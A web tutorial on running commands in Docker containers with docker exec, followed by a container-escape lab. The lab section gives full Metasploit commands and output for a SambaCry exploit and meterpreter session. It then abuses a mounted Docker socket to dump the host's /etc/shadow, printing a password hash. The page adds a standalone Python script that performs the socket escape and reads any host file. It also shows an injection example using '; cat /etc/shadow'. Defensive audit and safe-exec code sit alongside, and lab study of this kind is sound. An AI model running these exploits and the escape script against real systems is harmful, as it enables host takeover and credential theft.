Execute the shell or program inside the Docker container on the host

To avoid repeatedly entering the container to do things by hand, a series of commands inside the container can be issued from the host machine with docker exec.

Example: run the executable "printer", which lives in the /usr directory of the CentOS container named centos-1, from the host (the author's host is Windows 7). The program simply prints "123".

C:\Users\Administrator>docker exec -it centos-1 /bin/bash -c "cd usr && ./printer"
123

Success: the command ran inside the container and its output came straight back to the host prompt.
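The one-liner above is fine for a fixed command string, but the `/bin/bash -c "..."` form becomes a command-injection hole as soon as anything caller-supplied is spliced into that string: the shell inside the container will run whatever follows a `;`. The following is an added example (not code from the original article) of a small host-side wrapper that passes the program and its arguments as separate argv entries and sets the directory with `-w`, so no shell parses them. It assumes the Docker CLI is on PATH and a running container `centos-1` with `/usr/printer`, as in the article; the function names are ours.

```python
"""Run a program inside a running container from the host with `docker exec`.

Added example, not from the original article. Assumes the Docker CLI is on
PATH and a running container named `centos-1` containing /usr/printer (the
article's setup). The point is argument handling: `program` and `args` are
separate argv entries and never pass through a shell in the container.
"""
import re
import subprocess
from typing import List, Sequence, Tuple

# Docker's own rule for container names. Rejecting anything else also stops a
# name such as "-rm" from being parsed as an option to `docker exec` itself.
_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]+$")


def build_exec_argv(container: str, workdir: str, program: str,
                    args: Sequence[str] = (), tty: bool = False) -> List[str]:
    """argv for `docker exec` that runs `program args...` directly, no shell involved."""
    if not _NAME_RE.match(container):
        raise ValueError(f"invalid container name: {container!r}")
    argv = ["docker", "exec"]
    if tty:
        argv.append("-it")  # interactive use only; -t turns output into a terminal stream
    # -w sets the working directory, replacing the article's `cd usr &&`.
    argv += ["-w", workdir, container, program, *args]
    return argv


def build_exec_shell_string(container: str, user_arg: str) -> List[str]:
    """The injectable pattern, kept for contrast: user_arg is parsed by bash inside the container."""
    return ["docker", "exec", container, "/bin/bash", "-c", f"cd usr && ./printer {user_arg}"]


def run_in_container(container: str, workdir: str, program: str,
                     args: Sequence[str] = ()) -> Tuple[int, str, str]:
    """Execute the program and return (exit status, stdout, stderr).

    docker exec propagates the program's exit status, so rc is the container-side result.
    """
    proc = subprocess.run(build_exec_argv(container, workdir, program, args),
                          capture_output=True, text=True, check=False)
    return proc.returncode, proc.stdout, proc.stderr


if __name__ == "__main__":
    rc, out, err = run_in_container("centos-1", "/usr", "./printer")
    print(out, end="")  # the article's printer prints 123
    raise SystemExit(rc)
```

Compare the two builders with an argument such as `; cat /etc/shadow`: in `build_exec_argv` it stays a single argv element that `printer` receives verbatim, while in `build_exec_shell_string` it lands inside the `-c` string and becomes a second command for the container's bash.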

Additional knowledge: Using insecure deployment of Docker containers to gain host permissions

Preface

There are many ways to abuse containers and escape. This article will discuss the most basic one, which is to abuse the docker socket to escape the container and execute code as root on the host.

Experimental environment setup

Since we will be using containers, you must have docker installed.

Creating a network

First, we create a docker network where we will create the container:

docker network create pwnage

Start the vulnerable container

In this example, I will use a container affected by the SambaCry vulnerability (CVE-2017-7494). For more information about the vulnerability, see opsxcq/exploit-CVE-2017-7494.

This vulnerability allows remote code execution on the Samba server. To make the lab escapable we also mount the host's Docker socket into the container; that bind mount is the insecure deployment this article is about, and it is what we will abuse later:

docker run --rm -it \
    --name vulnerable \
    --network pwnage \
    -v '/var/run/docker.sock:/var/run/docker.sock' \
    vulnerables/cve-2017-7494
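The dangerous line in that command is `-v '/var/run/docker.sock:/var/run/docker.sock'`. As an added example (not part of the original article), here is how a defender would spot it: a short audit that reads `docker inspect` records and flags containers with the socket mounted, together with the other settings commonly used for escapes (privileged mode, the host root bind-mounted, the host PID namespace, CAP_SYS_ADMIN). The two sample records are constructed to mirror the lab's `docker run` commands and are not captured from a real daemon; `--live` switches to real `docker inspect` output.

```python
"""Audit `docker inspect` records for settings that let a container reach the host.

Added example, not from the original article. SAMPLE_INSPECT is constructed
to mirror the lab's two `docker run` commands; it is not daemon output.
"""
import json
import subprocess
from typing import Dict, List

DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}  # /var/run is usually a symlink to /run

SAMPLE_INSPECT: List[Dict] = [
    {   # docker run --name vulnerable -v /var/run/docker.sock:/var/run/docker.sock ...
        "Name": "/vulnerable",
        "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                       "Privileged": False, "PidMode": "", "CapAdd": None},
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                    "Destination": "/var/run/docker.sock", "RW": True}],
    },
    {   # the attacker box: a read-only copy of a binary is not an escape primitive
        "Name": "/attacker",
        "HostConfig": {"Binds": ["/usr/bin/docker:/docker:ro"],
                       "Privileged": False, "PidMode": "", "CapAdd": None},
        "Mounts": [{"Type": "bind", "Source": "/usr/bin/docker",
                    "Destination": "/docker", "RW": False}],
    },
]


def bind_sources(info: Dict) -> List[str]:
    """Host-side paths bind-mounted into the container, de-duplicated.

    HostConfig.Binds holds the raw `-v src:dst[:opts]` strings the operator passed;
    Mounts is the daemon's resolved view. Either may be null, so read both.
    """
    sources = set()
    for bind in (info.get("HostConfig") or {}).get("Binds") or []:
        sources.add(bind.split(":")[0])
    for m in info.get("Mounts") or []:
        if m.get("Type") == "bind" and m.get("Source"):
            sources.add(m["Source"])
    return sorted(sources)


def audit_container(info: Dict) -> List[str]:
    """Return one finding per dangerous setting; an empty list means none found."""
    name = info.get("Name", "?").lstrip("/")
    hc = info.get("HostConfig") or {}
    findings = []
    for src in bind_sources(info):
        if src in DOCKER_SOCKETS:
            findings.append(f"{name}: Docker socket {src} mounted (root on the host via the Engine API)")
        elif src == "/":
            findings.append(f"{name}: host root filesystem bind-mounted")
    if hc.get("Privileged"):
        findings.append(f"{name}: --privileged (all host devices, no capability bounding)")
    if hc.get("PidMode") == "host":
        findings.append(f"{name}: shares the host PID namespace")
    # CapAdd keeps whatever spelling the operator used: SYS_ADMIN or CAP_SYS_ADMIN.
    caps = {c.upper()[4:] if c.upper().startswith("CAP_") else c.upper()
            for c in hc.get("CapAdd") or []}
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append(f"{name}: CAP_SYS_ADMIN added (mount(2) and friends available)")
    return findings


def audit_all(records: List[Dict]) -> Dict[str, List[str]]:
    """Map container name -> findings, keeping only containers with at least one."""
    result = {}
    for info in records:
        findings = audit_container(info)
        if findings:
            result[info.get("Name", "?").lstrip("/")] = findings
    return result


def inspect_running() -> List[Dict]:
    """Live mode: inspect every running container through the Docker CLI."""
    ids = subprocess.run(["docker", "ps", "-q"], capture_output=True,
                         text=True, check=True).stdout.split()
    if not ids:
        return []
    raw = subprocess.run(["docker", "inspect", *ids], capture_output=True,
                         text=True, check=True).stdout
    return json.loads(raw)


if __name__ == "__main__":
    import sys
    records = inspect_running() if "--live" in sys.argv else SAMPLE_INSPECT
    for findings in audit_all(records).values():
        print("\n".join(findings))
```

Against the sample records only `vulnerable` is reported; the attacker box's read-only copy of the docker binary is harmless on its own, because without a socket to talk to the client does nothing.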

Start the attacker machine

After the lab environment is set up, we need to add the attacker's machine to the same network. There is an exploit available in the SambaCry repository, but I will use Metasploit here, as it makes uploading what I need easier.

I have built an image for this; run the command below and everything needed for the lab will start. Note the read-only mount of the host's docker binary at /docker, which we will upload into the target later:

docker run --rm -it \
    --network pwnage \
    -v '/usr/bin/docker:/docker:ro' \
    strm/metasploit

Once it has loaded you are dropped at the msfconsole prompt (msf5 >), from which the rest of the commands in this article are run.

Attack Exploitation

Information Collection

Information gathering is an essential part of any attack or test, so let's first ping the vulnerable container to check connectivity.

ping -c 2 vulnerable

If everything went well, you should see the following output.

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 
 
PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms
 
--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

We then do a basic SMB share enumeration:

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

The output is as follows:

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run
 
[+] 172.20.0.2:139 - data - (DS) Data
[+] 172.20.0.2:139 - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see, there is a share named data on this Samba server; it is writable, which the exploit will need in order to upload its payload library.

Get a shell

The next step is to run the exploit against the vulnerable container to get a shell. In Metasploit the module is named is_known_pipename and lives at exploit/linux/samba/is_known_pipename.

Run the commands below to attack the container:

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

If everything goes well you get a meterpreter session, as follows:

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit
 
[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable
 
meterpreter >

Privilege Escalation

We will escalate privileges by abusing the Docker socket that is available inside the container. The Docker daemon runs as root on the host, so anyone who can talk to its socket can ask it to do root-equivalent things: start a new container with any options they like, including --privileged or bind mounts of arbitrary host paths. The following explanation is taken from the Docker official documentation:

By default, Docker containers are "unprivileged" and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a "privileged" container is given access to all devices. When the operator executes docker run --privileged, Docker will enable access to all devices on the host as well as set some configuration in AppArmor or SELinux to allow the container nearly all the same access to the host as processes running outside containers on the host.

You can also hand specific devices to a container with the --device option. In this example, though, I will simply bind-mount the host's root filesystem (/) into a new container and read it from there; no --privileged is needed for that.

Since there is no docker client in the target container, the next thing to do is to upload one: the /usr/bin/docker binary we mounted read-only into the attacker container at /docker, plus its runtime dependency libltdl.so.7. You can do all of this by running the following meterpreter commands.

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker

The output is as follows:

meterpreter > upload /docker /docker
[*] uploading : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

Now we can use the uploaded client, which talks to the mounted socket, to reach the host's file system:

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

This asks the host's daemon to start a throwaway debian:9.2 container with the host's / bind-mounted at /rootfs, and reads the host's /etc/shadow through it, dumping the local users' password hashes. The output is as follows:

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::
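Uploading a 36 MB client is convenient but not required: the Docker daemon is just an HTTP server behind the mounted socket, so the same escape can be driven from any language that can open a UNIX socket, which is what a defender should expect when no docker binary is found on a compromised container. The following is an added example (not from the original article, Metasploit or Docker) that reproduces the steps of the `docker run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow` command above through the Engine API: create, start, wait, fetch logs, delete. Image, mount point and target path default to the article's values; the function names and the constructed log frame used in testing are ours.

```python
"""Escape through a mounted Docker socket with nothing but the Engine API.

Added example, not part of the original article. Defaults (debian:9.2,
/rootfs, /etc/shadow, /var/run/docker.sock) follow the article; the helper
names are ours. Run it inside a container that has the socket mounted.
"""
import http.client
import json
import socket
import struct
from typing import Dict, List, Optional, Tuple
from urllib.parse import quote

DOCKER_SOCK = "/var/run/docker.sock"


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that talks to a UNIX-domain socket instead of TCP."""

    def __init__(self, path: str) -> None:
        super().__init__("localhost")  # only used for the Host header
        self.unix_path = path

    def connect(self) -> None:
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def container_spec(image: str, cmd: List[str], mount_point: str = "/rootfs") -> Dict:
    """Body for POST /containers/create: bind the host's / into the new container.

    HostConfig.Binds is the API form of `-v /:/rootfs`. No --privileged is needed;
    a bind mount of the host root already gives root read/write on the host.
    """
    return {"Image": image, "Cmd": cmd, "HostConfig": {"Binds": [f"/:{mount_point}"]}}


def demux_logs(raw: bytes) -> Tuple[str, str]:
    """Split the multiplexed stream returned by GET /containers/{id}/logs.

    Without a TTY the daemon frames output with 8-byte headers: byte 0 is the
    stream (1 stdout, 2 stderr), bytes 4-7 the big-endian payload length.
    """
    out, err, pos = [], [], 0
    while pos + 8 <= len(raw):
        stream = raw[pos]
        size = struct.unpack(">I", raw[pos + 4:pos + 8])[0]
        (out if stream == 1 else err).append(raw[pos + 8:pos + 8 + size])
        pos += 8 + size
    return b"".join(out).decode(errors="replace"), b"".join(err).decode(errors="replace")


def _call(conn: http.client.HTTPConnection, method: str, path: str,
          body: Optional[Dict] = None) -> Tuple[int, bytes]:
    headers = {"Content-Type": "application/json"} if body is not None else {}
    conn.request(method, path, body=json.dumps(body) if body is not None else None,
                 headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


def read_host_file(host_path: str, image: str = "debian:9.2",
                   sock_path: str = DOCKER_SOCK) -> str:
    """create -> start -> wait -> logs -> delete a container that cats a host file."""
    conn = UnixHTTPConnection(sock_path)
    spec = container_spec(image, ["cat", "/rootfs" + host_path])
    status, body = _call(conn, "POST", "/containers/create", spec)
    if status == 404:  # image missing: unlike the CLI, the API does not auto-pull
        _call(conn, "POST", f"/images/create?fromImage={quote(image, safe='')}")
        status, body = _call(conn, "POST", "/containers/create", spec)
    if status != 201:
        raise RuntimeError(f"create failed: {status} {body!r}")
    cid = json.loads(body)["Id"]
    try:
        _call(conn, "POST", f"/containers/{cid}/start")
        _call(conn, "POST", f"/containers/{cid}/wait")  # blocks until cat exits
        _, raw = _call(conn, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    finally:
        _call(conn, "DELETE", f"/containers/{cid}?force=1")  # the API form of --rm
    stdout, stderr = demux_logs(raw)
    if stderr:
        raise RuntimeError(stderr.strip())
    return stdout


if __name__ == "__main__":
    import os
    import sys
    if not os.path.exists(DOCKER_SOCK):
        sys.exit("no docker socket mounted here; nothing to abuse")
    print(read_host_file(sys.argv[1] if len(sys.argv) > 1 else "/etc/shadow"), end="")
```

Two details matter in practice: the create call returns 404 when the image is not already on the host, because the API does not pull images implicitly the way the CLI does (hence the /images/create retry), and the logs endpoint returns a multiplexed byte stream when the container has no TTY, which is why demux_logs exists rather than a plain decode. The defensive conclusion is the same as for the uploaded client: a container that can reach the socket is root on the host, whatever binaries it ships with.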

That is all I have to share about executing a shell or program inside a Docker container from the host. I hope it serves as a useful reference, and I also hope you will support 123WORDPRESS.COM.
